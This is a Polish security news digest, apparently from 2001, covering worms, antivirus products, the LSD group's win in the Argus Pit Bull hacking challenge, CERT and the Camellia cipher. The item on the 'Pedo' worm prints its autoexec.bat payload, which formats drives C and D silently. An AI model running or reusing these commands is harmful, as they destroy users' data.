hacking.pl

Codzienna dawka nowych wiadomości ze świata bezpieczeństwa. Tutoriale, narzędzia, linux oraz testy penetracyjne.

Powrót Slackware

Obietnice developerów sprawdziły się. Projekt Slackware, który początkowo miał zostać zamknięty, w tej chwili nabiera nowych rumienców.

Najważniejszą sprawą jest to, iż dzięki uprzejmości SourceForge, udało się przenieść serwer FTP projektu Slackware. Przy okazji zmianie także uległ ChangeLog w slackware-current. Jedną z najważniejszych zmian jest uaktualnienie Samby do wersji 2.2.0.
Jak zapowiadają developerzy, coraz bliżej są zamknięcia projektu beta slackware-current.

Robak internetowy – Pedo

Pedo to robak internetowy napisany w języku Visual Basic Script, udającym skrypt zbierający adresy stron o treści pornograficznej. W rzeczywistości jego działanie polega na formatowaniu dysków twardych.

Po uruchomieniu przez użytkownika pliku robaka zmienia on zawartość pliku autoexec.bat, dodając do niego następujące polecenia:

Echo off
cls
Echo VBS/W98.pedo1.HDFK.V2
Echo.
Echo {{{ The only Warning from {{{ ^_int21h_^ }}} Never touch Kid’s }}}
Echo.
ctty nul
format c: /autotest /q /u
format d: /autotest /q /u

Po wprowadzeniu powyższych zmian robak restartuje komputer, który podczas następnego uruchamiania systemu formatuje dyski C i D. Operacja ta powoduje zniszczenie danych znajdujące się na wspomnianych dyskach.

Reporter.pl znów on-line

Reporter.pl opublikował dziś oficjalny powód awarii swojego serwera przez którą podczas ostatnich dni odwiedzenie serwisu było niemożliwe. Tak jak przewidywaliśmy głównym problemem stał się robak sieciowy – Lion.

Kaspersky Anti-Virus

Firma Kaspersky Labs, producent oprogramowania antywirusowego, wprowadza na rynek nową linię produktów Kaspersky Anti-Virus. Firma planuje wprowadzenie oddzielnego oprogramowania dla użytkowników domowych, małych firm i wielkich korporacji aby zaspokoić specyficzne wymagania różnych odbiorców.

W pierwszej kategorii znajdą się: Kaspersky AV Lite – odchudzona aplikacja antywirusowa, ze zmienionym interfejsem, stworzona z myślą o początkujących; Kaspersky AV Personal – dla bardziej zaawansowanych; Kaspersky AV Personal Pro – oferująca, oprócz skanera i monitora działalności wirusów, także filtr e-maili i skryptów oraz możliwość sprawdzania integralności plików. Kaspersky AV Personal oraz Personal Pro będą ponadto posiadały specjalny moduł dbający o bezpieczeństwo użytkowników programów pocztowych Microsoft Outlook Express. Ci ostatni byli w ostatnim czasie dosłownie zalewani wirusami pisanymi w językach skryptowych.

Specjalnie dla przedsiębiorstw Kaspersky Lab przygotował pakiet Kaspersky Business Optimal. Zawiera on oprogramowanie dla stacji roboczych (Windows 95/98/ME, Windows 2000/NT Workstation, Linux, OS/2, MS Office 2000 oraz DOS), serwerów (Windows 2000/NT Server, Linux, Novell NetWare, FreeBSD oraz BSD), a także bramek pocztowych (MS Exchange Server, Lotus Notes/Domino, Sendmail Qmail oraz Postfix). Ponadto zestawy są wyposażone w centrum zarządzania, ułatwiające pracę osobom administrującym firmowymi sieciami.

Dla największych, posiadających bardzo rozbudowane sieci lokalne i międzynarodowe, Kaspersky Lab oferuje Kaspersky Corporate Suite. Został on uzupełniony funkcjami firewalla, filtrującego przychodzące i wychodzące pakiety danych. Ponadto zawiera unikalną aplikację Kaspersky WEB Inspector. Będzie ona sprawdzać, czy witryny internetowe korporacji nie zostały podmienione przez niepowołane osoby. Wszystkie programy można już nabyć przez internet u producenta.

Infosystem ‚2001

Dziś w Poznaniu rozpoczynają się największe w Polsce targi telekomunikacji, informatyki i elektroniki Infosystem 2001. Podczas targów, odbywających się w dniach 24 – 27 kwietnia, liczni wystawcy będą prezentować produkty i rozwiązania z wielu dziedzin, przede wszystkim z zakresu telekomunikacji, sieci, internetu.

Także na targach zostaną przedstawione informacje i produkty z zakresu inteligentnych budynków, systemów wspomagania, zarządzania, specjalistycznego oprogramowania użytkowego, sprzętu komputerowego, systemów audiowizualnych, elektroniki, automatyki, usług i wydawnictw branżowych.

Dziurawy SmartDownload

Szczęśliwi, a może nieszczęśliwi posiadaczę programu Netscape SmartDownload nie mogą spać spokojnie. W oprogramowaniu tym znajduje się poważna dziura w zabezpieczeniach, która powoduje, że komputer, na którym zainstalowano ten plugin, jest podatny na ataki z zewnątrz.

Wywołane jest to błędem który występuje w jednej z bibliotek programu, pozwalając sobie tym samym na uruchomienie dowolnego kodu binarnego na lokalnym komputerze. Aby zapobiec atak z zewnątrz na nasz komputer, należy zainstalować nową wersję 1.4 SmartDownload.

 

Pit Bull złamany!

Czwórka Polaków, Michał Chmielewski, Sergiusz Fornrobert, Adam Gowdiak oraz Tomasz Ostwald włamali się do zainstalowanego na Solarisie Pit Bulla, reklamowanego przez producenta – firmę Argus, jako super bezpieczny.

Tym samym Polacy zwyciężyli w konkursie, w którym można było wygrać 48 tysięcy dolarów.
Artykuł dotyczący tego tematu poniżej:
A security firm that claimed it couldn’t be hacked can’t make brash statements anymore.

Argus admitted that a group from Poland has won the fifth Argus Hacking Challenge, but the security company said it screwed up in choosing an operating system.

Argus announced that hacking group the „Last Stage of Delirium,” was paid the 35,000 British pounds (US$48,000) prize that the company promised to any hacker who could break into a Pit Bull protected server.

Argus officially declared LSD’s four-man crew, Michal Chmielewski, Sergiusz Fornrobert, Adam Gowdiak and Tomasz Ostwald, winners — the first time the company acknowledged it had been hacked.

Argus said in a statement that LSD exploited a hole in Solaris 7 for the Intel X86 operating system that, according to hackers, had been known for some time. The hacking software that LSD used to crack into Argus’ test server allows someone to log in and create shell accounts on the server.

The contest was held during the Infosecurity Europe 2001 conference in London. Conference participants said LSD broke into the servers early Saturday morning, not long after the contest had begun.

„The vulnerability that allows you to create shell accounts on some X86 boxes running certain versions of Solaris is known in the cracking underground. It’s not widely used because the combination of that system and server isn’t hugely prevalent. I don’t think it’s been officially reported on any security lists,” said veteran cracker Taltos.

Argus pointed out that the hacking compromised the operating system, and not its PitBull security product.

The company admitted that it should have more thoroughly researched its choice of operating system. In hindsight, it said that operating system isn’t even worth using underneath its security software.

„Though no bug report had been posted, a thorough analysis of the base operating system should have discovered the bug prior to this event. It was not (that) LSD exploited the bug and breached the system,” Argus said in its statement

Argus said that Solaris for X86 is not widely deployed, so the company, seeing „no apparent long-term market potential for the PitBull for X86 product” has not maintained an ongoing code analysis of the base operating system and therefore was unaware of the security hole.

The company even spun its defeat as a reinforcement of its beliefs: „This successful exploit is concrete and dramatic validation of the message we have been trying to deliver to the market, namely: operating system security is absolutely mandatory in today’s environment,” Argus said in its statement.

Argus and LSD said they will not fully document the hack until the software companies release patches for the vulnerability.

„There’s no way that any product could have protected a system against this particular exploit,” Andrew Antipass of security consultancy TechServ said. „You could have a dozen firewalls layered in front of this hole and you could still get in. You have to have a secure operating system in order for any security products to really be effective.”

The vulnerability had not previously been posted on Solaris bug-tracking websites or mailing lists, and to the best of Argus’ knowledge no patch was or is presently available to correct the flaw.

But Argus isn’t using that as an excuse.

„We freely admit that in this instance PitBull did not protect the system from this exploit. Guilty as charged,” the company said in its statement.

Argus used the hack to continue its spat with Marquis Grove of SecurityNewsPortal.com, a news site for hackers and security professionals. Argus noted that hacker group LSD’s involvement „has amply and decisively” validated the company’s contention that the „best and brightest” hackers are not necessarily lawbreakers who refuse to expose themselves.

Grove had previously argued that the best hackers stay away from Argus’ challenges because the contest rules require them to disclose their identity.

Grove said he was not surprised that Argus lost its challenge. „We also took pleasure in noting that we were correct in our assumption that ‚anything created by man can be undone by an equally determined man’ — or in this case a crew of four equally determined men from Poland. The term ‚nyah-nyah’ seems appropriate at this time as we watch the humbled Pitbull eating crow and trying to do damage control.”

One person claimed to have successfully hacked the Argus system during a previous contest, but the company said the hack occurred after the deadline.

SecurityNewsPortal.com had offered to act as a representative for any hacker or cracker who might want to anonymously enter Argus’ latest contest.

Cracker Taltos said that while both hackers and crackers can be equally skilled, crackers — those who break into systems to do damage — have their own reasons for not participating in hacking challenges or contests.

„We’d prefer to keep our knowledge of security holes quiet,” said Taltos. „What’s the point of telling companies that you’ve found a hole? They’d only patch it.”

Rosyjscy hackerzy złapani

Amerykańskie władze federalne postawiły w stan oskarżenia dwóch rosyjskich hackerów. Odpowiedzą oni za włamanie do systemów komputerowych kilku firm działających w branży e-commerce i kradzież numerów kart kredytowych.

Istotna rzeczą jest to, iż hackerzy – po dokonaniu włamania – zgłaszali się do firmy, której serwery sami zhackowali oferując swoje usługi jako konsultanci ds. bezpieczeństwa systemu.

CERT – cena informacji

Amerykańska grupa badawcza CERT Coordination Center, będzie udostępniać zainteresowanym przedsiębiorstwom najnowsze rozwiązania w dziedzinie bezpieczeństwa komputerowego.

Grupa badawcza CERT, założona przez rząd USA w celu szybkiego wykrywania zagrożenie sieci komputerowych, będzie udostępniać zainteresowanym przedsiębiorstwom swe najnowsze odkrycia także prywatny sektor otrzyma dostęp do danych, które są przygotowywane specjalnie dla władz ale niestety, za to usługę jednak będzie musiał zapłacić.

Computer Emergency Response Team z siedzibą w Carnegie Mellon University w Pittsburghu, otrzymuje od władz federalnych ok. 3,5 mln USD na działalność. Obecnie badania nad bezpieczeństwem wesprą również przedsiębiorstwa komercyjne. Firmy skupione w organizacji Internet Security Alliance w zamian za wnoszone opłaty otrzymają dostęp do wykrytych luk na 45 dni przed ich upublicznieniem. Opłaty, w zależności od wielkości firmy, wyniosą od 2,5 tys. do 70 tys. USD. Ponadto zainteresowane firmy otrzymają raporty analizujące stan bezpieczeństwa w danym okresie, specjalny biuletyn poświęcony tym zagadnieniom oraz dostęp do szkoleń.

Jak stwierdził Rich Pethia, dyrektor CERT/CC, firmy uzyskają również możliwość współdecydowania o kierunkach badań. Obecnie Internet Security Alliance skupia 2100 firm, głównie z branży elektronicznej i komputerowej. Dzięki szybszemu uzyskiwaniu danych o zagrożeniach będą one mogły szybciej na nie reagować i zabezpieczać się przed podobnymi zdarzeniami w przyszłości. Powinno to się przyczynić do zmniejszenia strat z tytułu działania wirusów czy ataków hakerów.

 

Specyfikacja szyfru Camelia

Japońskie firmy NTT i Mistubishi Electronic udostępniły publicznie specyfikację szyfru Camelia, opracowanego na zasadach konkursu CRYPTREC mającego wyłonić standardy szyfrowania i ochrony danych w administracji japońskiej.

Camelia jest szyfrem blokowym o kluczu długości 128 bitów, wydajnym w implementacji sprzętowej oraz programowej. Szyfr został także zgłoszony do konkursu Nessie, mającego wyłonić podobny zestaw standardów na potrzeby Unii Europejskiej.